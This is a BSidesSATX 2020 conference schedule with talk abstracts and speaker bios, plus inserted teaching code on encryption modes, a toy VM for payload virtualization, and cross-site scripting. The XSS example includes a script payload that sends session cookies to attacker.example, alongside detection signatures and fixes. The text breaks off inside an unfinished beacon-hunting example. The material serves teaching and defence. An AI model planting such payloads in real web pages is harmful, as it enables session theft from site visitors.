Presentations
Presentation and speaker details for BSidesSATX 2020 speaking tracks
TRACK 1: IN THE BEGINNING
09:00 - Cons & Careers
“If you compete with others, you may not win. If you compete with yourself, you always win by becoming better.” ― Debasish Mridha
How do you come across new ideas to keep things fresh? To borrow a saying, if you’re the smartest person in the room, you’re in the wrong room! Attending conferences is one way to learn about different viewpoints. Peeking into points along a career path will demonstrate an approach to keeping an eye on constant growth, while watching out for warning signs for burn out. Compete against yourself and no one else. The point is, the introduction of new ideas is essential to keep adding value to ourselves and the things we do.
Steven Bernstein
09:30 - I had no idea what I was doing, but now you do
My transition from just enjoying computers and hobby hacking, to formal education, and on to full-time employment in the information security space. It simplifies and streamlines some of the skills I feel got me to where I am today so others don't have to learn them the 'hard and slow' way.
Aaron Rubesh
Self starter who got into cyber security without really realizing it.
10:00 - The World’s Prettiest (fake) Cyber Warfare Ops Center - and How I Built It
In collaboration with the San Antonio Museum of Science and Technology (SAMSAT) and the Institute of Electrical and Electronics Engineers (IEEE), I built a massive mockup of a cyber-warfare operations center (SOC). Overall, this was a very interesting project which solicits a very interesting talk.
Nilo Mackey
I'm Nilo Mackey, a 14-year-old (unemployed for obvious reasons) CompTIA-certified network technician and IT tech, as well as a sophomore at ISA/LEE High School. Ever since I was a kid I have loved everything tech-related, and I have been learning/programming/building/tinkering for as long as I can remember. I have recently moved more and more towards cybersecurity, and it is a career field that I am very strongly interested in. I not only love both producing and consuming technology, but also love good art, making music, and (occasionally) playing airsoft/speedqb.
11:00 - Breaking Down Walls with Windows
Kali Linux, Black Arch, ParrotOS... Microsoft Windows? Taking penetration testing and red teaming to places they tend to shy away from while utilizing free open source software to build a powerful offensive Windows box. Anything you can do in Kali, you can do in Windows... Even installing Kali!
Alexander Klepal
Alexander Klepal is a researcher and Cybersecurity Expert with Booz Allen Hamilton. A nationally ranked “Penetration Tester” (2nd in CIAS Cyber Panoply Fall 2016), regionally ranked CCDC competitor (2nd at SWCCDC Spring 2017), and most recently SANS GIAC GPEN certified penetration tester, Alexander continues to tinker and teach every day. “It’s my mission in life to take the technology we all use every day and make it safer and more accessible to everyone, even if I have to pop a few boxes to do it!”
11:30 - Deep dive into cloud DevOps through Infrastructure as Code
While infrastructure as code (IaC) offers a systematic way to build datacenters and enforce standards in the cloud, this powerful capability remains largely unharnessed. We analyzed 500,000 IaC templates on GitHub to study the security pitfalls commonly overlooked in cloud infrastructure.
Jay Chen
Dr. Jay Chen is a cloud security researcher with Unit 42 at Palo Alto Networks. His current research focuses on the public cloud and cloud-native security. Before joining Palo Alto Networks, he was a researcher in Accenture Cyber Lab, where his research focused on the DevOps, Blockchain, and ICS security. In the past, he had worked on designing secure distributed data storage and data processing systems for mobile devices.
13:00 - Threat Intelligence: How to Focus Fire on the Bad Guys Coming for Your Network
Defense teams have an extremely difficult task: protect their organization from all malicious actors, 24/7. For smaller/younger defense teams, this can be incredibly challenging. Where do you start? Who do you hunt for first, and how is that decided? My presentation aims to answer these questions.
Kyle Hubert
Network Analyst and Blue Team Lead for the USAF. Recently he has focused on how to improve the use of cyber threat intelligence, specifically looking to increase the effectiveness of smaller/newer threat hunter teams. Some of his other interests include improving his Red Team skills, hiking, and snowboarding.
14:00 - From Kali and a Couple of VMs to NextGen Home Lab. An Approach to Practice and Develop your Skills
Can we put an entire small business infrastructure in one physical box at home? Let's find out
Bashar Shamma
Bashar is a Sr. Security Specialist at a Fortune 100 company. He is part of the blue team, focusing on Threat Intel and Threat Hunting. Throughout his career, Bashar has had the privilege of analyzing and responding to hundreds of detections for many organizations across various industries, and has provided technical guidance to prevent such incidents in the future. Bashar holds a Master's Degree in Information System Security and the GCFE, GNFA, GCTI and GCIH certifications. In his spare time, Bashar has a passion for building and testing various environments and solutions in his home lab.
15:00 - Mentoring 101
Ever been a Daniel in need of a Mr. Miyagi? Are you ready to achieve greatness but with no real clue where to start? Finding a mentor is the first step, but knowing how to make the most of the time spent with your mentor makes the real difference. Join in on a conversation about identifying your person of influence and building a plan together, from wax on, wax off to being carried away by the cheering crowd.
What can I expect to learn? There has been a push in our community to be active mentors. What is not explained, however, is how to foster a healthy and prosperous relationship that benefits both the mentor and the mentee. Together we will explore the different types of mentoring relationships that exist, as well as how to set goals, track progress towards those goals, and get the most out of a mentorship.
Ell Marquez
16:00 - Broken Arrow
I discuss how the BSides community can apply InfoSec and forensic practices to assist domestic abuse victims in cutting the electronic cord to their abuser. I cover social media, IoT, printers, metadata, defeating surveillance (including weaponized PDFs), and how our assistance can make a great change.
Will Baggett
Former Intelligence Community officer, current NATO SOF cyber trainer and volunteer of many BSides conferences. I was a SME for iOS and Mac forensics and now apply these skills to the private sector. SciaticNerd has the best twitter handle.
TRACK 2: IN THE CLOUDS
09:00 - Climbing App Sec Mountains (and how to summit)
AppSec teams are often told to "shift left", or to be involved earlier in the software development life cycle. We will detail the ways that companies create their own roadblocks and how to help their application security team succeed by instead "shifting out". Inspired by middle-out compression.
Adam Schaal
Adam Schaal is a Principal Application Security Researcher with Contrast Security with an extensive background in both development and application security. He has experienced both sides of making and breaking applications so he can always relate to his audience. Adam enjoys contributing to information security projects such as the CTF platform redctf and the malicious cable implant O.MG-Cable. He is also very active in his local security community as a founder of Kernelcon, a mid-size information security conference, and DEF CON 402, a local DEF CON group. Adam works out of Omaha, Nebraska, one of the least likely places in the United States to encounter shark attacks or suffer altitude sickness.
10:00 - Agile Compliance and Risk Ops
Many companies adopt DevOps or Agile practices only to crash against compliance walls such as RMF, PCI-DSS, or even GDPR. After being an Agile Product Owner, I moved to security, driving RMF in a new Agile org. This session shares my experiences incorporating Agile as a U.S. Government contractor.
Mark Peters
Dr. Mark Peters, US Air Force retired, spent 22+ years as an intelligence operator and now works as a Security Engineer at Technica Corporation on a US Air Force cyber weapon system in San Antonio, TX. As a cybersecurity professional, he recently had the opportunity to watch Agile adoption on several government programs. He authored "Cashing in on Cyberpower", analyzing system-level economic impacts of over 10 years of cyber-attacks. Still relatively new to named Agile and DevSecOps processes, he worked with many similar processes in the Air Force and remains excited by growth opportunities in Agile security practices.
11:00 - Modern Symmetric Encryption
Encryption has significantly changed over the past 20 years but most examples in textbooks and classes show the same encryption modes used from the '70s through the turn of the century. Modern browsers, APIs, and platforms use different and more secure methods to protect data. Let's dive into how!
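The contrast the abstract draws, between the unauthenticated block modes of older textbooks and the authenticated modes (AEAD) that modern TLS and platform APIs use, can be shown in a few lines. The following Go program is an added example for this page, not the speaker's material: it encrypts the same constructed message under AES-CBC and under AES-GCM, flips one ciphertext byte in each, and decrypts. CBC returns a silently altered plaintext (a byte flipped in ciphertext block 0 flips the same byte of plaintext block 1, and nothing detects it), while GCM rejects the tampered message. The fixed key, IV and nonce are constructed demo values so the run is reproducible; real code uses a fresh random IV/nonce per message.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

// Constructed demo material (never hard-code or reuse these in real code).
var (
	demoKey   = []byte("0123456789abcdef0123456789abcdef") // 32 bytes: AES-256
	demoIV    = []byte("fixed-iv-16bytes")                 // 16-byte CBC IV
	demoNonce = []byte("fixed-nonce!")                     // 12-byte GCM nonce
	demoAAD   = []byte("msg-v1")                           // header bound by the GCM tag
)

func pkcs7Pad(b []byte, bs int) []byte {
	n := bs - len(b)%bs
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte, bs int) ([]byte, error) {
	if len(b) == 0 || len(b)%bs != 0 {
		return nil, errors.New("bad length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > bs || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// cbcEncrypt/cbcDecrypt: the "textbook" mode. Confidentiality only; nothing
// here can tell a genuine ciphertext from one an attacker has modified.
func cbcEncrypt(key, iv, pt []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	padded := pkcs7Pad(pt, block.BlockSize())
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return ct, nil
}

func cbcDecrypt(key, iv, ct []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ct)%block.BlockSize() != 0 {
		return nil, errors.New("ciphertext is not a multiple of the block size")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt, block.BlockSize())
}

// gcmSeal/gcmOpen: an AEAD mode. The authentication tag covers the ciphertext
// and the associated data, so any modification is rejected before plaintext
// is released.
func gcmSeal(key, nonce, pt, aad []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return aead.Seal(nil, nonce, pt, aad), nil
}

func gcmOpen(key, nonce, ct, aad []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return aead.Open(nil, nonce, ct, aad)
}

// tamperCBC encrypts msg, XORs mask into ciphertext byte idx, and decrypts.
// With idx in block 0, plaintext block 1 comes back with the same byte flipped
// and no error is raised.
func tamperCBC(msg []byte, idx int, mask byte) ([]byte, error) {
	ct, err := cbcEncrypt(demoKey, demoIV, msg)
	if err != nil {
		return nil, err
	}
	ct[idx] ^= mask
	return cbcDecrypt(demoKey, demoIV, ct)
}

// tamperGCM does the same to a GCM ciphertext; Open fails authentication.
func tamperGCM(msg []byte, idx int, mask byte) ([]byte, error) {
	ct, err := gcmSeal(demoKey, demoNonce, msg, demoAAD)
	if err != nil {
		return nil, err
	}
	ct[idx] ^= mask
	return gcmOpen(demoKey, demoNonce, ct, demoAAD)
}

func main() {
	// Two exact 16-byte blocks; byte 7 of block 1 is the leading '0' of "0100".
	msg := []byte("sessionid=ABCDEFamount=0100;ok=1")
	pt, err := tamperCBC(msg, 7, '0'^'9')
	fmt.Printf("CBC: err=%v, block 1 now %q\n", err, pt[16:])
	pt, err = tamperGCM(msg, 7, '0'^'9')
	fmt.Printf("GCM: err=%v, plaintext=%q\n", err, pt)
}
```

The CBC result still unpads cleanly because the padding block depends only on the untouched last two ciphertext blocks; a receiver that checks nothing beyond padding accepts "amount=9100". The same attack against GCM yields an authentication error and no plaintext at all, which is the property the modern modes in the talk's title are chosen for.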
Carl Mehner
Carl Mehner is an information security engineer who has spent the last decade working with public key infrastructure, certificates, and secure protocols. He has also worked on standards and protocols, including the latest version of TLS and a round 1 submission to NIST's quest for a new symmetric encryption algorithm.
13:00 - Fighting the Third Party Risk Monster
This talk will cover the main threats third parties such as vendors bring to your systems and networks and tips and tricks AKA best practices on how to tame the third party risk beast.
TonyH
Tony Howlett is a published author and speaker on various security, compliance, and technology topics. He serves as President of (ISC)2 Austin Chapter and is an Advisory Board Member of GIAC/SANS. He is a certified AWS Solutions Architect and holds the CISSP, GNSA certifications, and a B.B.A in Management Information Systems. Tony is currently the CISO at SecureLink.
14:00 - Incident Response is HARRRRRD… but it doesn’t have to be
So your EDR, AV, or other fancy, shiny, blinky-lights security tool alerted you that Bob's Windows box has some suspicious activity.
Do you have the details you need to investigate or remediate the system? Can you quickly and easily investigate it?
Michael Gough
Michael is a Malware Archaeologist, Blue Team defender, Incident Responder and logoholic. Michael developed several Windows logging cheat sheets to help the security industry understand Windows logging, where to start and what to look for. Michael is a primary contributor to the Open Source project ARTHIR. Michael is also co-developer of LOG-MD, a free tool that audits the settings, harvests and reports on malicious Windows log data and malicious system artifacts. Michael also blogs on HackerHurricane.com on various InfoSec topics. Michael is also co-host of the “Brakeing Down Incident Response” BDIR Podcast, which educates on daily Incident Response tasks. Michael also ran BSides Texas for five years for the Austin, San Antonio, Dallas and Houston cons.
15:00 - Tradecraft vs. Toolkit: Who’s Truly Important and What’s Actually to Blame?
I've seen the impact of failing to make people skilled in the art of security, creating tool jockeys, instead. Without strong tradecraft, they won't get the banana when the button stops working. This is presenting the challenge of replacing skill with technology and offering strategies to fix it.
Logan "WALL-E" Waldenville
Logan "WALL-E" Waldenville is a calibrator-turned-cyber security specialist for the US Air Force. His eclectic background includes Cyber Threat Emulation, Tactics Development, Tool Validation/Development, Defensive Cyber Operations, Threat Hunting, Operations Planning, and Operator Training. Sgt Waldenville has spent the better part of a decade developing new hires of all sorts into skilled technicians and analysts. Logan holds certifications in Exploit Development/Advanced Penetration Testing, Windows Forensics, and Cyber Security Operations. WALL-E enjoys dabbling in language learning, both of the spoken and programming varieties, as well as leveraging his knack for odds-and-ends acquisition into unique solutions.
16:00 - Software Supply Chain Attacks and You
Open source is under attack, and you are too. Software supply chain attacks are getting easier, and happening more and more often. Learn how to protect yourself from them, and how we need to work together as an industry to prevent this type of attack all together.
Dan Lorenc
Dan Lorenc is a Software Engineer at Google focused on open source Cloud technologies. He leads an engineering team focused on making it easier to build and deliver secure, reliable systems for Kubernetes. He created the Minikube, Skaffold, and Tekton open-source projects, and is a member of the Technical Oversight Committee for the Continuous Delivery Foundation.
TRACK 3: IN THE THICK OF IT
09:00 - What Does It Take to Find a Job These Days?
Job search is always a bewildering endeavor. According to the Department of Labor, most professionals will have at least 15 jobs in their lifetime, and in our community that number is almost double. It is a full-time job finding your next job, but we don’t all have that time to spare in our lives. You may think you have a handle on finding your next job, but what really goes on in recruiting and hiring may surprise you. What tools and strategies should you always have on hand so that you succeed rather than fail? Hear from a panel of recruiters on what they recommend job seekers do to stay in the game.
Panelists:
Kirsten Renner, Novetta
Rachel Bozeman, CenturyLink
Lisa Gregg, CPS Energy
Lones B. Seiber, IPSecure Inc.
Moderator: Kathleen Smith
Kathleen Smith is Chief Outreach Officer at ClearedJobs.Net/CyberSecJobs.Com, both veteran-owned companies, where she spearheads the community-building and communications outreach initiatives catering to both organizations’ many audiences, including security-cleared job seekers, cybersecurity candidates and military personnel. Kathleen has presented on recruiting and job search within the cyber security world at several security conferences, including BSidesLV, BSidesTampa, BSidesDE and FedCyber.
Kathleen volunteers in the cybersecurity community; she is the Director of HireGround, BSidesLV’s 2-day career track. Kathleen is well respected within the recruiting community and is the co-founder and Past President of recruitDC, the largest community of recruiters in the Washington DC area.
10:00 - Where to go next in your cybersecurity career? Advice for Transitioning Military Community Members
There’s no shortage of advice out there for transitioning veteran job seekers – unfortunately much of the advice tends to be cookie-cutter tips focusing on the most basic of topics. This program will help transitioning veterans in the cyber security industry understand the hiring landscape, highlight the difference between the recruiters who put you in the service and the ones working to help you land that first job as a civilian, and show how to leverage job boards and job fairs, including virtual events. We’ll even put some special emphasis on how to really build your professional network and manage your transition from different geographical locations.
Bob Wheeler, Account Manager, ClearedJobs.Net
After 20 years in the Navy, with the last three serving as a recruiter, Bob has been a veteran hiring advocate providing presentations and newsletter content to several organizations around the country, including Recruiting Daily. As an Account Manager, he assists employers in developing their recruiting strategies for hiring security-cleared talent.
11:00 - Changing Employers? - When, why and how
Are you changing employers? Are you thinking about changing employers? Why would you make the move, and when does it make the most sense? Finally, in 2020, what steps should you take to make the move as easy as possible for all involved?
Paul Guido, CISSP, CCSP
I am a security professional at a San Antonio financial institution where I work as a Security Janitor.
13:00 - Putting Out the Fire: 4 Proven Strategies for Hiring and Retaining Security Talent
As an industry, we have a Layer 8 problem, and it's our own fault! We say there's a talent shortage, and that we need good people; but once we get them, we just burn them out, leaving a trail of dissatisfied and unhappy workers behind us. This talk covers key strategies to change that - let's go!
Frank McClain
Frank McClain is a US Army veteran of the first Gulf War, and an accomplished cyber investigator with deep experience in digital forensics and incident response. He has worked as a DFIR consultant, managed security operations for a national financial services firm, and is a threat analyst and training lead within the Detection Engineering team of the Red Canary CIRT.
14:00 - Infosec Jobsearch Best Practices
From grossly impossible job posts to ghosting recruiters, our community, full of smart people, finds itself stuck attempting to find its next career opportunity.
This talk walks through each stage from searching, networking, interviewing and negotiations with tips to increase chances of success.
Kirsten Renner
Kirsten is the Sr Director of Recruiting at Novetta, an advanced analytics and full spectrum cyber security company. She studied HR Management at University of Maryland. After a short while working as a software developer, then help desk manager, she combined her love for technology and HR by becoming a Technical Recruiter and has been doing so for over 20 years. For the last decade, Kirsten has been primarily supporting the Information Security field, and is best known in the community for her volunteer activities especially her involvement in the Car Hacking Village from its inception!
15:00 - The Pentester Blueprint: A Guide to Becoming a Pentester
Pentesting is a very popular area of cybersecurity. While there are lots of resources on pentesting, the subject of how to start a career has been overlooked. I share my experience of helping others get into pentesting. The experience I share is from mentoring and teaching.
Phillip Wylie, CISSP, GWAPT, OSCP
Phillip Wylie is a Penetration Tester, Adjunct Instructor at Richland College, and The Pwn School Project founder. Phillip has over 22 years of experience in InfoSec and IT. He has performed pentests on networks, wireless networks, and applications, including mobile and web apps. Phillip has a passion for sharing, mentoring and educating. This passion motivated him to start teaching and to found The Pwn School Project, a free monthly educational meetup with a focus on ethical hacking. Phillip teaches Ethical Hacking and Web Application Pentesting at Richland College in Dallas, TX.
16:00 - Leading, Managing and Succeeding Remotely
Security has always been a discipline that is amenable to remote work. But even those who have spent time in remote cultures weren't prepared for the quantity and level of remoteness of the past few months. In this talk, Mike will talk about the challenges and opportunities in managing a remote team, including understanding how to hire and recruit, onboard new members of the team and manage for team cohesion and engagement.
Mike Murray, Founder, Scope Security
Mike has built global information security programs and has a proven track record of implementing pragmatic and results-driven security organizations which balance risks against business imperatives and rewards. He has always taken a "talent first" approach, surrounding himself with great people (who really deserve all the credit) and doing what he could to enable them and their business partners to execute on information security outcomes from a business focus.
Mike is currently the Founder of Scope Security focusing on information security in the healthcare field. His past positions have included CSO, Lookout and Director Product Development Security for GE Healthcare.
TRACK 4: IN THE WEEDS
09:00 - Automating disk and memory evidence collection in AWS
During an incident, answers are needed quickly. Often this starts with evidence collection and log correlation. At Goldman Sachs, we have automated an event-driven cloud response platform that uses AWS native services to successfully collect disk and memory from compromised EC2 instances.
Ryan Tick
Vaishnav Murthy
Ryan Tick and Vaishnav Murthy are cloud security architects for Goldman Sachs, responsible for automating the detection, analysis, and reporting of security incidents in Goldman's public cloud environment. They work with the firmwide Security Incident Response Team to design and conduct purple team exercises and respond to tier 3 security incidents in the cloud. Prior to working at Goldman, they were digital forensics and incident response (DFIR) consultants who led high-profile cybercrime investigations for Fortune 100 clients across the globe. They both hold various AWS and GIAC certifications and are GIAC advisory board members.
10:00 - Automating Binary Deobfuscation Processes: Dynamic Taint Analysis and Symbolic Code Execution
Our talk consists of:
- An implementation of a simple 32-bit stack machine which we use to virtualize "payloads".
- Control flow obfuscation on the binary using a generic obfuscator.
- Automated de-obfuscation of these binaries using Triton and Libdft.
And how the underlying methodologies work!
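To make the first bullet concrete, here is a toy 32-bit stack machine of the kind used to "virtualize" a payload: the real logic is moved into opaque bytecode that an interpreter executes, so a static disassembly of the native code shows only the dispatch loop. This is an added example, not the speakers' VM; the opcode set, encoding and sample payloads are assumptions.

```python
"""A toy 32-bit stack VM that virtualizes a payload. Added example; the opcode
set and encoding are assumptions, not the speakers' VM."""

MASK = 0xFFFFFFFF
PUSH, ADD, SUB, XOR, MUL, DUP, SWAP, JZ, JMP, LOAD, STORE, HALT = range(12)
WITH_IMM = (PUSH, JZ, JMP)          # opcodes followed by a 32-bit little-endian immediate


def asm(*items):
    """Two-pass assembler: 'name:' defines a label, a bare string references one."""
    code, labels, pos, want_imm = bytearray(), {}, 0, False
    for it in items:                              # pass 1: label offsets
        if isinstance(it, str) and it.endswith(":"):
            labels[it[:-1]] = pos
        elif want_imm:
            pos, want_imm = pos + 4, False
        else:
            pos, want_imm = pos + 1, it in WITH_IMM
    want_imm = False
    for it in items:                              # pass 2: emit bytes
        if isinstance(it, str) and it.endswith(":"):
            continue
        if want_imm:
            imm = labels[it] if isinstance(it, str) else it
            code += (imm & MASK).to_bytes(4, "little")
            want_imm = False
        else:
            code.append(it)
            want_imm = it in WITH_IMM
    return bytes(code)


def run(code, stack=(), mem=None, max_steps=100_000):
    """Interpret bytecode; every arithmetic result is truncated to 32 bits."""
    stack, mem, pc = list(stack), dict(mem or {}), 0
    for _ in range(max_steps):
        op = code[pc]
        pc += 1
        if op in WITH_IMM:
            imm = int.from_bytes(code[pc:pc + 4], "little")
            pc += 4
        if op == PUSH:
            stack.append(imm)
        elif op in (ADD, SUB, XOR, MUL):
            b, a = stack.pop(), stack.pop()
            stack.append({ADD: a + b, SUB: a - b, XOR: a ^ b, MUL: a * b}[op] & MASK)
        elif op == DUP:
            stack.append(stack[-1])
        elif op == SWAP:
            stack[-1], stack[-2] = stack[-2], stack[-1]
        elif op == JZ:
            if stack.pop() == 0:
                pc = imm
        elif op == JMP:
            pc = imm
        elif op == LOAD:
            stack.append(mem.get(stack.pop(), 0))
        elif op == STORE:                          # top of stack = address, below it = value
            addr, val = stack.pop(), stack.pop()
            mem[addr] = val & MASK
        elif op == HALT:
            return stack, mem
        else:
            raise ValueError(f"bad opcode {op} at offset {pc - 1}")
    raise RuntimeError("step limit hit: runaway loop?")


# Payload 1: an arithmetic transform, native form and virtualized twin.
def native_transform(x):
    return ((((x * 0x9E3779B1) & MASK) ^ 0xDEADBEEF) + 0x1337) & MASK


TRANSFORM = asm(PUSH, 0x9E3779B1, MUL, PUSH, 0xDEADBEEF, XOR, PUSH, 0x1337, ADD, HALT)


def vm_transform(x):
    stack, _ = run(TRANSFORM, [x & MASK])
    return stack[-1]


# Payload 2: a loop with real control flow, mem[i] ^= key for i in 0..n-1.
def decode_program(key):
    """Input stack: [n]. Uses JZ/JMP so the VM's control flow is data-dependent."""
    return asm(
        "loop:", DUP, JZ, "end",        # [i]                      exit when counter hits 0
        PUSH, 1, SUB, DUP, DUP,         # [i-1, i-1, i-1]
        LOAD, PUSH, key, XOR,           # [i-1, i-1, mem[i-1]^key]
        SWAP, STORE,                    # mem[i-1] = decoded   ->  [i-1]
        JMP, "loop",
        "end:", HALT)


def vm_decode(blob, key):
    _, mem = run(decode_program(key), [len(blob)], dict(enumerate(blob)))
    return bytes(mem[i] for i in range(len(blob)))


if __name__ == "__main__":
    encoded = bytes(b ^ 0x5A for b in b"hello")
    print(hex(vm_transform(0x12345678)), vm_decode(encoded, 0x5A))
```

The deobfuscation problem the talk addresses is visible here: a taint engine such as Libdft sees only the handlers of `run` touching the input, and a symbolic executor such as Triton must track the `pc` and `stack` state through the dispatch loop to recover that `TRANSFORM` is a multiply, an XOR and an add over the input.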
Usama Saqib
I work as an R&D engineer at Trapmine, and I spend my time researching and building systems to perform automated malware detection and analysis. Recently, our focus has been to integrate automated deobfuscation facilities into the detection and analysis system. The talk I am presenting will discuss some of the approaches we have taken to try and manage this problem.
Berk Cem Goksel
Bachelor of Fine Arts, Acting. Worked as a Penetration Tester for 5 years, before moving to STM A.S. as a cyber threat intelligence analyst. Dog love for 24 years.
11:00 - Weaponized XSS - Moving Beyond Alert(1)
Alert(1): it's everyone's favorite cross-site scripting (XSS) payload, but that doesn't mean you have to stop there. In this talk, we will explore the variety of exploits we can weaponize after we've gotten that alert box to pop. From session hijacking to crypto mining, there are a multitude of ways to exploit your victim with this decades-old class of vulnerability. It's sometimes hard to get buy-in to correct XSS vulnerabilities because an alert box isn't a compelling risk - this talk shows how to weaponize flaws once they're found.
For offensive security pros, you will walk away with a few new tricks to add to your engagements. People on the defensive side will learn signatures to detect and alert on. And for everyone else, come find out why XSS always finds its way to the top of web vulnerability top 10 lists.
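As an added illustration (not the speaker's material) of the three angles the talk covers: the alert(1) probe next to a cookie-stealing payload, the output-encoding and cookie-flag fixes on the server side, and request-log signatures a defender can alert on. The attacker host, the search handler and the access-log lines are constructed.

```python
"""Reflected XSS: probe vs weaponized payload, the server-side fix, and request-log
signatures. Added example, not the speaker's material; attacker.example and the
log lines are constructed."""
import html
import re
from urllib.parse import unquote_plus

# Beyond alert(1): ship the session cookie to a host the attacker controls.
HIJACK_PAYLOAD = ("<script>new Image().src='https://attacker.example/c?'"
                  "+encodeURIComponent(document.cookie)</script>")


def render_search_vulnerable(q):
    """Reflects the query straight into HTML: the classic XSS sink."""
    return f"<h1>Results for {q}</h1>"


def render_search_fixed(q):
    """Output encoding for an HTML text-node context neutralises the payload."""
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


def session_cookie_header(value, hardened=True):
    """HttpOnly keeps the cookie out of document.cookie, so the payload above
    steals nothing even while the XSS itself is still unfixed."""
    flags = "; HttpOnly; Secure; SameSite=Lax" if hardened else ""
    return f"Set-Cookie: session={value}; Path=/{flags}"


# Request-log signatures. Illustrative, not a complete WAF ruleset.
SIGNATURES = {
    "inline_script": re.compile(r"<script\b", re.I),
    "remote_script": re.compile(r"<script[^>]+src\s*=\s*['\"]?https?://", re.I),
    "cookie_exfil": re.compile(r"document\.cookie", re.I),
    "event_handler": re.compile(r"\bon\w+\s*=", re.I),
    "js_uri": re.compile(r"javascript\s*:", re.I),
    "browser_miner": re.compile(r"coinhive", re.I),   # a once-common in-browser miner
}


def scan_request(line):
    """Return the signature names that fire on one URL-decoded request line."""
    decoded = unquote_plus(line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


ACCESS_LOG = [  # constructed
    "GET /search?q=shoes HTTP/1.1",
    "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1",
    "GET /search?q=%3Cscript%3Enew+Image().src%3D%27https://attacker.example/c%3F%27"
    "%2Bdocument.cookie%3C/script%3E HTTP/1.1",
    "GET /search?q=%3Cscript+src%3Dhttps://attacker.example/coinhive.min.js%3E%3C/script%3E HTTP/1.1",
]


def scan_log(lines):
    """(line, fired signatures) for every line that trips at least one rule."""
    scanned = [(line, scan_request(line)) for line in lines]
    return [(line, hits) for line, hits in scanned if hits]


if __name__ == "__main__":
    print(render_search_vulnerable(HIJACK_PAYLOAD))
    print(render_search_fixed(HIJACK_PAYLOAD))
    print(session_cookie_header("abc123"))
    for line, hits in scan_log(ACCESS_LOG):
        print(hits, line)
```

The log scan is deliberately decoded once before matching; real payloads arrive double-encoded, in POST bodies and in headers, so the same rules belong in the WAF or the request-logging middleware rather than in a grep over the access log. A `Content-Security-Policy` that forbids inline script is the third control alongside encoding and HttpOnly.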
Ray Doyle
The man, the myth, the legend; Ray Doyle, OSCE, OSCP, GXPN, aka @doylersec is an avid pentester and security enthusiast. He now works as a Senior Staff Adversarial Engineer at Avalara, and has been there for over six months now. You can also visit his blog at https://www.doyler.net, where he has been posting for over four years now!
When he's not hacking for work he's, well, hacking for fun as well...Ray has attended various security conferences for the past few years now, and has even spoken at CarolinaCon, BSides Manchester, BrrCon, BSides Denver, and BSides Raleigh/RDU. He has competed in numerous hacking competitions and CTFs over the years, most recently with Team Eversec, and managed to place 1st in the DerbyCon 9 CTF, 1st in the DEF CON 24 SOHOpelessly Broken CTF (winning a DEF CON 'black badge'), and 1st in the DEF CON 25 Wireless CTF (helping to win another black badge).
Other than security, you can always hit him up in City of Heroes (@doyler) or a Super Smash Brothers Melee money match.
13:00 - Securing AND Pentesting the Great Spaghetti Monster (k8s)
Oh sure, Kubernetes is the Bomb! But is it secure out-of-the-box? Oh hell no! Let's see if we can change that. Let's start with a live Kubernetes cluster running on a stack of Pis (there are visuals). So we have an app and we deploy it, but before we do that, let's make sure our cluster is secure.
rnbwkat
Based in Pittsburgh and a natural creature of winter, you can typically find me sipping Grand Mayan Extra Anejo whilst simultaneously defending my systems using OSS, magic spells and Dancing Flamingos. Honeypots & Refrigerators are a few of my favorite things! Fun Fact: I currently own 35 Raspberry Pis and I am an alien - not sure which planet though. (yes, I am weird)
14:00 - Automating Attacks Against Google Home Device Provisioning
Google Home (and other similar home assistant) devices have an out-of-box provisioning process. The talk will demo the secure points of that process as well as a new automated tool for tricking an already set-up device into re-provisioning to the attacker's network.
Rodney Beede
Originally I was a software engineer writing enterprise-scale distributed web applications. Computer security started as a hobby and turned into a full-time career when I discovered the web code I was writing could be manipulated by attackers. My curiosity with web security led me to a full-time career in hacking. I've also picked up lock picking as a hobby and enjoy introducing others to it.
Other talks and vulnerability research I have done: https://www.rodneybeede.com/curriculum%20vitae/bio.html
15:00 - Overt Operations | When the Red Team gets in your Face!
We talk covert operations all the time, but there’s more. What does an advanced red team do when their cover is blown? What changes do you make when the blue team already knows you're there? How do we operate overtly!?
In this talk, we delve into the specialized world of advanced red teaming. Here we move beyond the basics of an Active Directory domain and discuss methods to acquire freedom of maneuver within a target environment by leveraging all of the nuances that make each enterprise unique. We'll explore effects-driven operations and examine techniques to safely target Industrial Control Systems (ICS). Finally, advanced red teamers don't simply attack enterprises; they craft techniques to attack the enterprise defenses, weaponizing them against the organization itself. The thing is... if the defenders already know you’re there, what could be better than making them think you’re everywhere!
Want a sneak preview of an in-development SANS class on advanced red teaming? Let's go!
Matthew Toussain, CTO, Open Security Inc.
16:00 - Not my server C2: Using trusted sources for C2
I am not saying security is perfect, but it is getting better. This requires offensive personnel to find crafty ways to gain remote communications to their clients. Instead of using your untrusted infrastructure, why not use trusted infrastructure approved by your target (**cough Slack)?
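The defensive counterpart, as an added example that is not the speakers' tooling: when C2 rides a SaaS domain the business already allows, the destination is on the allow-list and the TLS is legitimate, so the tell has to come from behaviour. The hunt below groups proxy-log records per (source, host) pair and flags low variance in inter-request timing plus a non-browser client. The proxy-log lines are constructed; the thresholds are assumptions to tune per environment.

```python
"""Beacon hunting for C2 over a trusted SaaS domain. Added example, not the
speakers' tooling; the proxy log lines are constructed and the thresholds are
assumptions."""
import shlex
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

UA_CHROME = '"Mozilla/5.0 (Windows NT 10.0) Chrome/83.0"'
PROXY_LOG = [  # constructed: ts src dest method path "user-agent" bytes
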